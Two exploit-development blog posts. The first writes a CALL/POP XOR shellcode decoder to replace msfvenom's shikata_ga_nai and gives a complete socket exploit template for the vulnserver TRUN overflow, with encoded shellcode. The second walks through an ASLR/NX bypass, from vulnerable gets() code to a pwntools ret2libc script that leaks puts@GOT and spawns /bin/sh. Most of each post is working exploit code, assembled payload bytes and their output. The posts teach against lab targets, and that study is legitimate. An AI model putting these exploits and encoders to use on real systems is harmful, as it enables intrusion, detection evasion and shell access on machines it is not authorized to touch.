# Fukahi Tekiō 不可避適応: Bypassing Win 10/11 FPU "Issues" via Custom CALL/POP XOR Encoder

**Published:** 2026-01-15

**Author:** Jacob Swinsinski (0xXyc / JAKESWIZ)

**[⛧ GitHub: fukahi-na-tekio ⛧](https://github.com/0xXyc/fukahi-na-tekio)**

---

## Introduction

This technique was developed while exploiting the `vulnserver` TRUN buffer overflow, but it applies to other exploits as well. It should be especially useful to anyone new to exploiting x86/x64 targets that run under ARM emulation.

The motivation came from wanting to run Windows exploitation demos on an ARM Mac (running Windows 11 on AArch64 with the Prism emulation layer) for a talk at Wild West Hackin' Fest in Denver.

## The Problem

When exploiting buffer overflows on modern Windows systems (especially under ARM emulation), `msfvenom`'s default encoder (`shikata_ga_nai`) crashes during shellcode execution:

```
eax=00000000 ebx=00000000 ecx=00000052 edx=02ff4a30 esi=55bd55d0 edi=00401848
eip=089ff959 esp=089ff924 ebp=00000000
089ff959 317012          xor     dword ptr [eax+12h],esi
Attempt to read from address 00000012
```

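The decoder dereferences a register (EAX, EBP, or ESI, depending on the generated stub) that holds zero instead of the decoder's own address. In the crash above, EAX is `0x00000000`, so `[eax+12h]` resolves to `0x00000012`.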

### Why This Happens

`shikata_ga_nai` uses a GetPC technique relying on FPU (Floating Point Unit) instructions:

```assembly
fcmovb st, st(5)        ; Any FPU instruction (its address gets recorded)
fnstenv [esp-0xc]       ; Store the FPU environment so its instruction pointer field lands at [esp]
pop ebp                 ; Pop that field: the address of the fcmovb above
```

On Windows 10/11 and under ARM emulation (Prism), the FPU instruction pointer field often comes back zeroed. When the decoder does `pop ebp`, it gets `0x00000000` instead of its own address, uses that value as a base pointer, and crashes on the first memory access.
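
To see why a zeroed field is fatal, it can help to model what `fnstenv` writes. The sketch below is a plain-Python simulation, not shellcode: the helper name `simulate_fnstenv_getpc` and the sample addresses are hypothetical. It assumes the 28-byte 32-bit protected-mode environment layout, in which the FPU instruction pointer sits at offset `0x0c`, so storing the environment at `esp-0xc` places that field exactly at `[esp]`.

```python
import struct

FPU_ENV_SIZE = 28   # size of the 32-bit protected-mode FNSTENV image
FIP_OFFSET = 0x0C   # offset of the FPU instruction pointer field


def simulate_fnstenv_getpc(esp, fpu_ip, stack_size=0x100):
    """Model `fnstenv [esp-0xc]` followed by `pop reg`.

    `esp` is an index into a simulated stack; `fpu_ip` is whatever the
    CPU (or emulator) reports as the address of the last FPU instruction.
    """
    stack = bytearray(stack_size)
    env = bytearray(FPU_ENV_SIZE)
    struct.pack_into("<I", env, FIP_OFFSET, fpu_ip)
    base = esp - 0x0C
    stack[base:base + FPU_ENV_SIZE] = env
    # `pop reg` reads the dword at [esp], which is the FIP field.
    (popped,) = struct.unpack_from("<I", stack, esp)
    return popped


working = simulate_fnstenv_getpc(esp=0x40, fpu_ip=0x089FF950)  # FIP populated
broken = simulate_fnstenv_getpc(esp=0x40, fpu_ip=0)            # FIP zeroed
print(hex(working), hex(broken))
```

With a populated field the pop returns a usable address; with a zeroed field it returns `0`, which is the value the crashing decoder then adds an offset to.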

## The Solution: CALL/POP GetPC

Instead of relying on FPU quirks, use the reliable CALL/POP technique:

```assembly
    jmp short call_label    ; Jump to the CALL
pop_label:
    pop esi                 ; ESI now contains address of encoded shellcode
    ; ... decoder logic ...
call_label:
    call pop_label          ; Pushes address of encoded shellcode, jumps back
    ; encoded shellcode starts here
```

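When the CPU executes a `CALL` instruction, it pushes the address of the *next* instruction onto the stack. Because the encoded shellcode is placed directly after the `CALL`, that pushed address is the address of the shellcode, and we immediately `POP` it into a register. This works regardless of FPU state, because pushing the return address is part of what `CALL` does architecturally.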
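
The push-then-pop behavior can be modeled in a few lines. This is only an illustrative simulation with a hypothetical load address; `simulate_call_pop` is not part of any tool, and the 5-byte length assumes the near `CALL rel32` encoding (`E8` plus a 4-byte displacement).

```python
def simulate_call_pop(call_addr, call_len=5):
    """Return the value POP receives after a near CALL at `call_addr`."""
    stack = []
    return_address = call_addr + call_len  # address of the byte after the CALL
    stack.append(return_address)           # CALL pushes the return address
    return stack.pop()                     # POP ESI retrieves it


stub_base = 0x089FF940     # hypothetical address where the stub was loaded
call_offset = 15           # hypothetical offset of the CALL inside the stub
esi = simulate_call_pop(stub_base + call_offset)
print(hex(esi))
```

Whatever address the stub ends up at, ESI always equals the address of the first byte after the `CALL`, which is where the encoded shellcode begins.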

## Complete XOR Decoder Stub

### For shellcode under 256 bytes:

```assembly
    jmp short call_label    ; Jump forward to the CALL (rel8 = 0x0d)
pop_label:
    pop esi                 ; ESI = address of encoded shellcode
    xor ecx, ecx            ; Clear counter
    mov cl, <length>        ; Shellcode length (patch this byte)
decode_loop:
    xor byte [esi], <key>   ; XOR decode one byte (patch this byte)
    inc esi                 ; Next byte
    loop decode_loop        ; Decrement ECX, repeat until ECX = 0
    jmp short shellcode     ; Jump over CALL to decoded shellcode (rel8 = 0x05)
call_label:
    call pop_label          ; Push address of shellcode, jump back to POP
shellcode:
    ; encoded shellcode here
```

**Assembled bytes:**
```python
decoder_small = (
    b"\xeb\x0d"              # jmp short +13 (lands on the call at offset 15)
    b"\x5e"                  # pop esi
    b"\x31\xc9"              # xor ecx, ecx
    b"\xb1\x00"              # mov cl, <length> - PATCH THE SECOND BYTE
    b"\x80\x36\x00"          # xor byte [esi], <key> - PATCH THE THIRD BYTE
    b"\x46"                  # inc esi
    b"\xe2\xfa"              # loop -6 (back to the xor)
    b"\xeb\x05"              # jmp short +5 (over the call, to the shellcode)
    b"\xe8\xee\xff\xff\xff"  # call -18 (back to pop esi)
)
```
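
The displacements in the stub are not magic numbers; each one is the distance from the end of the branching instruction to the start of its target. The following sketch recomputes them from the instruction lengths as a sanity check. The names in `LAYOUT` are labels chosen for this example only.

```python
import struct

# (label, length in bytes) for each instruction of the small stub, in order.
LAYOUT = [
    ("jmp_to_call", 2), ("pop_esi", 1), ("xor_ecx", 2), ("mov_cl", 2),
    ("xor_byte", 3), ("inc_esi", 1), ("loop", 2), ("jmp_to_sc", 2),
    ("call", 5),
]


def offsets(layout):
    """Map each label to its starting byte offset; 'end' marks the shellcode."""
    table, pos = {}, 0
    for name, size in layout:
        table[name] = pos
        pos += size
    table["end"] = pos
    return table


def rel(table, layout, src, dst):
    """Displacement from the end of instruction `src` to the start of `dst`."""
    size = dict(layout)[src]
    return table[dst] - (table[src] + size)


off = offsets(LAYOUT)
jmp_rel = rel(off, LAYOUT, "jmp_to_call", "call")   # forward to the CALL
loop_rel = rel(off, LAYOUT, "loop", "xor_byte")     # back to the XOR
skip_rel = rel(off, LAYOUT, "jmp_to_sc", "end")     # over the CALL
call_rel = rel(off, LAYOUT, "call", "pop_esi")      # back to POP ESI

print(struct.pack("<b", jmp_rel).hex(), struct.pack("<b", loop_rel).hex(),
      struct.pack("<b", skip_rel).hex(), struct.pack("<i", call_rel).hex())
```

The same calculation applies to any variant of the stub: change an instruction length in `LAYOUT` and the required displacement bytes follow.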

### For shellcode 256-65535 bytes:

```assembly
    jmp short call_label    ; Jump forward to the CALL (rel8 = 0x0f)
pop_label:
    pop esi                 ; ESI = address of encoded shellcode
    xor ecx, ecx            ; Clear counter
    mov cx, <length>        ; Shellcode length (patch these bytes, little endian)
decode_loop:
    xor byte [esi], <key>   ; XOR decode one byte (patch this byte)
    inc esi                 ; Next byte
    loop decode_loop        ; Decrement ECX, repeat until ECX = 0
    jmp short shellcode     ; Jump over CALL to decoded shellcode (rel8 = 0x05)
call_label:
    call pop_label          ; Push address of shellcode, jump back to POP
shellcode:
    ; encoded shellcode here
```

**Assembled bytes:**
```python
decoder_large = (
    b"\xeb\x0f"              # jmp short +15 (lands on the call at offset 17)
    b"\x5e"                  # pop esi
    b"\x31\xc9"              # xor ecx, ecx
    b"\x66\xb9\x00\x00"      # mov cx, <length> - PATCH THE LAST TWO BYTES (little endian)
    b"\x80\x36\x00"          # xor byte [esi], <key> - PATCH THE THIRD BYTE
    b"\x46"                  # inc esi
    b"\xe2\xfa"              # loop -6 (back to the xor)
    b"\xeb\x05"              # jmp short +5 (over the call, to the shellcode)
    b"\xe8\xec\xff\xff\xff"  # call -20 (back to pop esi)
)
```
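
Patching the placeholders by hand is error-prone, so a small helper can fill them in. The function below is a hypothetical convenience wrapper around the two stubs shown above, not part of the original tooling. It also rejects a patched stub that contains a null byte, which happens when either byte of a 16-bit length is `0x00` (for example, 256 = `0x0100`).

```python
import struct


def build_decoder(length, key):
    """Fill the length and key placeholders of the stubs shown above."""
    if not 1 <= key <= 0xFF:
        raise ValueError("key must be a single non-zero byte")
    if 1 <= length <= 0xFF:
        # Small stub: mov cl, imm8
        head = b"\xeb\x0d\x5e\x31\xc9" + b"\xb1" + bytes([length])
        call = b"\xe8\xee\xff\xff\xff"
    elif 0x100 <= length <= 0xFFFF:
        # Large stub: mov cx, imm16 (little endian)
        head = b"\xeb\x0f\x5e\x31\xc9" + b"\x66\xb9" + struct.pack("<H", length)
        call = b"\xe8\xec\xff\xff\xff"
    else:
        raise ValueError("length must be between 1 and 65535")
    stub = head + b"\x80\x36" + bytes([key]) + b"\x46\xe2\xfa\xeb\x05" + call
    if b"\x00" in stub:
        raise ValueError("patched stub contains a null byte; pad the shellcode")
    return stub


stub = build_decoder(324, 0x09)
print(stub.hex())
```

For a length such as 256, one workaround is to pad the shellcode with a trailing NOP before encoding so that neither length byte is zero.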

## Finding a Safe XOR Key

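The XOR key must not appear anywhere in the original shellcode: any byte equal to the key encodes to `0x00`. The following script tries every key from `0x01` to `0xff` and prints the first one that produces null-free output: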

```python
#!/usr/bin/python3
import sys

def find_key_and_encode(hex_shellcode):
    shellcode = bytes.fromhex(hex_shellcode)

    for key in range(1, 256):
        encoded = bytes([b ^ key for b in shellcode])
        if b'\x00' not in encoded and key not in shellcode:
            print(f"Safe XOR key: 0x{key:02x}")
            print(f"Shellcode length: {len(shellcode)} (0x{len(shellcode):02x})")
            print("\nEncoded shellcode:")
            encoded_str = ''.join(f'\\x{b:02x}' for b in encoded)
            for i in range(0, len(encoded_str), 64):
                print(f'"{encoded_str[i:i+64]}"')
            return key, encoded

    print("ERROR: No safe XOR key found!")
    return None, None

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 encode.py <hex_shellcode>")
        print("Example: python3 encode.py $(msfvenom -p windows/exec CMD=calc.exe -f hex)")
        sys.exit(1)

    find_key_and_encode(sys.argv[1])
```
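
Before dropping encoded bytes into an exploit, it is worth confirming that the stub's loop really restores the original. The sketch below mirrors the decode loop in Python; `emulate_decoder` is a hypothetical name, and the sample bytes are the first 16 bytes of the payload used in the exploit template in this article (recovered by XORing its encoded bytes with `0x09`).

```python
def xor_bytes(data, key):
    """XOR every byte of `data` with the single-byte `key`."""
    return bytes(b ^ key for b in data)


def emulate_decoder(encoded, key, length):
    """Mirror the stub's loop: XOR `length` bytes in place, one at a time."""
    buf = bytearray(encoded)
    esi, ecx = 0, length
    while ecx:
        buf[esi] ^= key   # xor byte [esi], key
        esi += 1          # inc esi
        ecx -= 1          # loop decrements ECX
    return bytes(buf)


original = bytes.fromhex("fce8820000006089e531c0648b50308b")
key = 0x09
encoded = xor_bytes(original, key)
decoded = emulate_decoder(encoded, key, len(encoded))
print(encoded.hex())
print(decoded == original)
```

Because XOR is its own inverse, a mismatch here almost always means the length or the key patched into the stub differs from the one used for encoding.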

## Complete Exploit Template

```python
#!/usr/bin/python3
import socket

target = '10.211.55.6'
port = 9999

prefix = b'A' * 2006                   # Offset to EIP
eip = b'\xaf\x11\x50\x62'              # JMP ESP address (0x625011af, little endian)
nopsled = b'\x90' * 16

# CALL/POP XOR decoder for shellcode > 255 bytes
# Length: 324 = 0x0144 (little endian: \x44\x01)
# Key: 0x09
decoder = (
    b"\xeb\x0f"              # jmp short to call
    b"\x5e"                  # pop esi
    b"\x31\xc9"              # xor ecx, ecx
    b"\x66\xb9\x44\x01"      # mov cx, 0x0144 (324)
    b"\x80\x36\x09"          # xor byte [esi], 0x09
    b"\x46"                  # inc esi
    b"\xe2\xfa"              # loop -6
    b"\xeb\x05"              # jmp short to shellcode
    b"\xe8\xec\xff\xff\xff"  # call back to pop esi
)

# XOR-encoded shellcode (output from encode.py)
encoded_shellcode = (
    b"\xf5\xe1\x8b\x09\x09\x09\x69\x80\xec\x38\xc9\x6d\x82\x59\x39\x82"
    # ... rest of encoded shellcode
)

# Pad the payload to a fixed total of 3000 bytes
padding = b'F' * (3000 - len(prefix) - 4 - len(nopsled) - len(decoder) - len(encoded_shellcode))
payload = prefix + eip + nopsled + decoder + encoded_shellcode + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.recv(1024)                           # Read the banner
s.sendall(b'TRUN .' + payload + b'\r\n')
s.close()
```

## Debugging Tips

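If the exploit still crashes, step through the decoder in WinDbg:
1. `bp <jmp_esp_address>` to break on the `JMP ESP` gadget
2. `g` to run until the breakpoint is hit
3. `t 20` to single-step through the following instructions and watch the decoder run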

**Common issues:**
- Wrong jump offsets: The `jmp` and `call` offsets are relative and must be exact
- Wrong shellcode length: Double-check the byte count
- Additional bad characters: Some protocols filter more than just null bytes
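
When a protocol filters more than null bytes, the key search can take a set of bad characters instead. This is a minimal sketch under that assumption; `find_key` and its `bad_chars` parameter are hypothetical and not part of `encode.py`. It checks only the encoded payload and the key itself, so the fixed bytes of the decoder stub still need to be checked separately.

```python
def find_key(shellcode, bad_chars=b"\x00"):
    """Return the first single-byte key whose encoding avoids `bad_chars`."""
    bad = set(bad_chars)
    for key in range(1, 256):
        if key in bad:
            continue  # the key itself is embedded in the decoder stub
        if all((b ^ key) not in bad for b in shellcode):
            return key
    return None  # no single-byte key works for this shellcode


sample = b"\x01\x02"
print(find_key(sample))                 # only null bytes are bad
print(find_key(sample, b"\x00\x02"))    # 0x02 is filtered as well
```

If no key qualifies, the function returns `None`; a multi-byte key or a different encoding scheme would be needed in that case.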

## Summary

When `msfvenom`'s FPU-based encoders such as `shikata_ga_nai` fail on modern Windows (particularly in Prism ARM-emulated environments), roll your own CALL/POP decoder. It's simple, reliable, and doesn't depend on FPU state that may not be populated correctly.

⛧ *Malware Bless* ⛧


# Bypassing ASLR & NX/DEP (Diving Deeper)

**Published:** 2023-11-01

**Author:** Jacob Swinsinski (0xXyc / JAKESWIZ)

---

## Introduction

**ASLR (Address Space Layout Randomization)** randomizes the addresses of shared libraries, the stack, and the heap. It does NOT randomize the main binary unless the binary is compiled as a PIE (Position Independent Executable). ASLR was created to defeat memory corruption exploits that rely on hardcoded addresses.

### Verify ASLR with ldd
```bash
ldd aslr-1
# Addresses change each run:
linux-vdso.so.1 (0x00007ffffdcdd000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fdb9f400000)
```
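
Comparing runs by eye gets tedious, so the address can be pulled out of the `ldd` output programmatically. The sketch below parses the text format shown above; `lib_base` is a hypothetical helper, and the second sample line uses a made-up address purely to stand in for another run.

```python
import re


def lib_base(ldd_output, name="libc.so.6"):
    """Extract the load address that ldd reports for `name`, or None."""
    for line in ldd_output.splitlines():
        if name in line:
            match = re.search(r"\((0x[0-9a-fA-F]+)\)", line)
            if match:
                return int(match.group(1), 16)
    return None


run1 = "libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fdb9f400000)"
# Hypothetical output of a second run, for illustration only.
run2 = "libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f1c2a200000)"

print(hex(lib_base(run1)), hex(lib_base(run2)))
print("ASLR active:", lib_base(run1) != lib_base(run2))
```

To use it on a real binary, pass in the captured output of `ldd ./aslr-1` from two separate invocations; identical addresses on every run suggest ASLR is disabled.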

## Bypassing ASLR: Three Methods

1. **Address leaking** (covered here) - knowledge of PLT and GOT
2. **Relative addressing**
3. **Bruteforcing**

## Vulnerable Code (aslr-1.c)

```c
#include <stdio.h>

int main(int argc, char* argv[]) {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    char buffer[40];
    printf("Enter some data:\n");
    gets(buffer);  // Vulnerable!

    printf("So, you think you can bypass the almighty ASLR protection?\n");
    return 0;
}
```

### Compile with Docker (downgraded GCC for correct gadgets)
```bash
docker run --rm --mount type=bind,source="$(pwd)",target=/app -w /app gcc:10.5.0 gcc -Wall -g -fno-stack-protector -no-pie aslr-1.c -o aslr-1
```

### Checksec Output
```bash
checksec aslr-1
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled        # Need ROP
    PIE:      No PIE (0x400000)
```

## Exploitation Strategy

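Since NX is enabled, the stack is not executable, so we need **ROP (Return-Oriented Programming)**. Since ASLR is enabled, we also need to understand the **GOT (Global Offset Table)**.

The GOT acts as a "dictionary" of external addresses: each entry holds the runtime address of an imported function such as `puts` from `libc`. The dynamic linker fills in these entries at runtime, so they reflect the randomized load address.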

### Why puts()?

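Calling `puts()` with the address of its own GOT entry as the argument prints the resolved address of `puts` inside `libc`. Subtracting the known offset of `puts` within `libc` then reveals where `libc` is mapped in memory.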

### View puts@GOT
```bash
objdump -R aslr-1
# Look for: 0x0000000000003fc0 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5
```

### Find puts@PLT (fixed address, unaffected by ASLR)
```bash
objdump -d -M intel aslr-1 | grep "puts@plt"
# Result: 0000000000401030 <puts@plt>
```

### Find ROP Gadget (pop rdi; ret)

The System V x86-64 calling convention used on Linux passes the first argument in the RDI register, so we need a gadget that loads RDI from the stack.
```bash
ropper --file aslr-1 --search "pop rdi"
# Result: 0x00000000004011cb: pop rdi; ret;
```

### Find Offset with cyclic pattern
```bash
gdb aslr-1
cyclic 100
# Pattern: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa
r
# Paste pattern
# Crash on ret! The saved RBP was overwritten with "gaaaaaaa"
cyclic -l gaaaaaaa
# Result: Found at offset 48
# 48 + 8 (saved RBP) = 56 bytes of padding before the return address
```
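
The lookup that `cyclic -l` performs can be reproduced without a debugger. The sketch below rebuilds the pattern excerpt shown above and searches it; `simple_cyclic` is a simplified, hypothetical stand-in that only matches the real generator for the first 26 eight-byte blocks.

```python
def simple_cyclic(length, width=8):
    """First `length` chars of the pattern; valid only for the first 26 blocks."""
    blocks = (chr(ord("a") + i) + "a" * (width - 1) for i in range(26))
    return "".join(blocks)[:length]


pattern = simple_cyclic(100)
found = pattern.find("gaaaaaaa")   # the value reported by the debugger
padding = found + 8                # skip the 8-byte slot before the return address

print(found, padding)
```

The value at `pattern[padding:padding + 8]` is what would land in the return address slot, which is where the ROP chain has to start.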

## Exploit Development: Three Stages

1. **Leak** the libc address (`puts@GLIBC`)
2. **Obtain** addresses and offsets
3. **Calculate** the base address of libc

## Automated Exploit with pwntools

```python
#!/usr/bin/env python3
from pwn import *
from pwnlib.rop.rop import ROP
from pwnlib.util.packing import p64, u64

exe = context.binary = ELF('./aslr-1', checksec=False)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)

p = process(exe.path)

# Stage 1: Leak libc address
offset = b'A' * 56

rop = ROP(exe)
rop.puts(exe.got['puts'])
rop.call(exe.symbols['main'])

payload = offset + rop.chain()
p.sendline(payload)

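p.recvuntil(b'protection?\n')          # Skip the prompt and the final message
leak = p.recvline().rstrip(b'\n')      # puts() prints the raw address bytes plus a newline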
leaked_puts = u64(leak.ljust(8, b"\x00"))
log.success(f"Leaked puts@GLIBC: {hex(leaked_puts)}")

# Stage 2: ret2libc
libc_base = leaked_puts - libc.symbols['puts']
libc.address = libc_base

rop2 = ROP(libc)
ret = rop2.find_gadget(["ret"])[0]
rop2.system(next(libc.search(b'/bin/sh\x00')))

payload = offset + p64(ret) + rop2.chain()
p.sendline(payload)

p.interactive()
```
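
The `ljust(8, b"\x00")` step exists because `puts()` stops printing at the first null byte, so a user-space address arrives as six bytes rather than eight. A dependency-free sketch of the same conversion follows; `parse_leak` is a hypothetical name, and the sample bytes are the little-endian form of the address shown in the sample output of this article.

```python
import struct


def parse_leak(raw):
    """Convert the bytes printed by puts() into a 64-bit integer."""
    if len(raw) > 8:
        raise ValueError("leak is longer than a pointer; wrong line captured?")
    # Restore the high null bytes that puts() did not print.
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


raw = bytes.fromhex("500e68e0f47f")   # six bytes, least significant first
leaked_puts = parse_leak(raw)
print(hex(leaked_puts))
```

If the parsed value does not look like a `0x7f...` address, the script most likely captured the wrong line of output.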

## What's Happening in the Code?

1. **Stage 1 ROP Chain:**
   - `pop rdi; ret` → pops address of `puts@GOT` into RDI
   - `puts@PLT` → writes the address to STDOUT
   - `main()` → returns into `main` again, so the same process (with the same randomized `libc` base) reads a second payload

2. **Calculate libc base:**
   ```python
   libc_base = leaked_puts - libc.symbols['puts']
   ```

3. **Stage 2 ROP Chain (ret2libc):**
   - `ret` → a lone `ret` gadget that shifts the stack by 8 bytes so it is 16-byte aligned when `system()` runs
   - `pop rdi; ret` → pops address of `/bin/sh` into RDI
   - `system()` → executes `/bin/sh`
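
The arithmetic behind the base calculation can be checked by hand. In the sketch below, the leaked address comes from the sample output in this article, while `PUTS_OFFSET` and `SYSTEM_OFFSET` are assumptions inferred from that same output; on a real target they come from `libc.symbols` and vary between libc builds.

```python
PAGE_SIZE = 0x1000


def libc_base(leaked, symbol_offset):
    """Subtract a symbol's offset from its leaked runtime address."""
    base = leaked - symbol_offset
    if base % PAGE_SIZE:
        # A base that is not page-aligned means a wrong libc or a bad leak.
        raise ValueError(f"suspicious libc base {base:#x}")
    return base


leaked_puts = 0x7ff4e0680e50
PUTS_OFFSET = 0x80e50      # assumption: offset of puts in this libc build
SYSTEM_OFFSET = 0x50d70    # assumption: offset of system in this libc build

base = libc_base(leaked_puts, PUTS_OFFSET)
system_addr = base + SYSTEM_OFFSET
print(hex(base), hex(system_addr))
```

The page-alignment check is a cheap way to catch a mismatched `libc.so.6` before sending the second payload.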

## Result

```bash
[*] Stage 1 ROP Chain:
    0x0000:         0x40120b pop rdi; ret
    0x0008:         0x404018 [arg0] rdi = got.puts
    0x0010:         0x401030 puts
    0x0018:         0x401142 0x401142()
[+] Leaked puts@GLIBC: 0x7ff4e0680e50
[*] Stage 2 ROP Chain:
    0x0000:   0x7ff4e062a3e5 pop rdi; ret
    0x0008:   0x7ff4e07d8698 [arg0] rdi = 140689715070616
    0x0010:   0x7ff4e0650d70 system
[*] Switching to interactive mode
$ whoami
# Shell acquired!
```

## Key Takeaways

1. **Leak, don't guess** - Use `puts@GOT` to leak a libc address
2. **Calculate base** - Subtract known offset to find libc base
3. **Return to main()** - The process must stay alive between the leak and the final payload, because a restart re-randomizes the addresses
4. **System V x86-64 needs `pop rdi; ret`** - First argument goes in RDI
5. **Stack alignment** - Add a `ret` gadget before `system()` on some systems
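
The alignment point can be made concrete with a little arithmetic. The System V x86-64 ABI expects `RSP % 16 == 8` at function entry. The sketch below assumes the overwritten return-address slot itself sits at an address that is 8 mod 16 (as it does after a normal `call`); the slot address and the helper `rsp_at_entry` are hypothetical.

```python
def rsp_at_entry(first_slot, chain, target):
    """RSP value when `target` begins executing.

    `first_slot` is the address of the overwritten return-address slot.
    Each chain entry occupies 8 bytes, and the `ret` that transfers
    control to `target` has already popped the target's own slot.
    """
    target_slot = first_slot + 8 * chain.index(target)
    return target_slot + 8


FIRST_SLOT = 0x7FFD00001008  # hypothetical; any address with value % 16 == 8

plain = ["pop rdi; ret", "&/bin/sh", "system"]
padded = ["ret"] + plain

for name, chain in (("plain", plain), ("padded", padded)):
    rsp = rsp_at_entry(FIRST_SLOT, chain, "system")
    print(f"{name}: RSP % 16 at system() entry = {rsp % 16}")
```

Under these assumptions the unpadded chain enters `system()` with a misaligned stack, and the extra `ret` shifts it by 8 bytes into the expected state.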

⛧ *ASLR is not a silver bullet. Understand the GOT. Become the exploit.* ⛧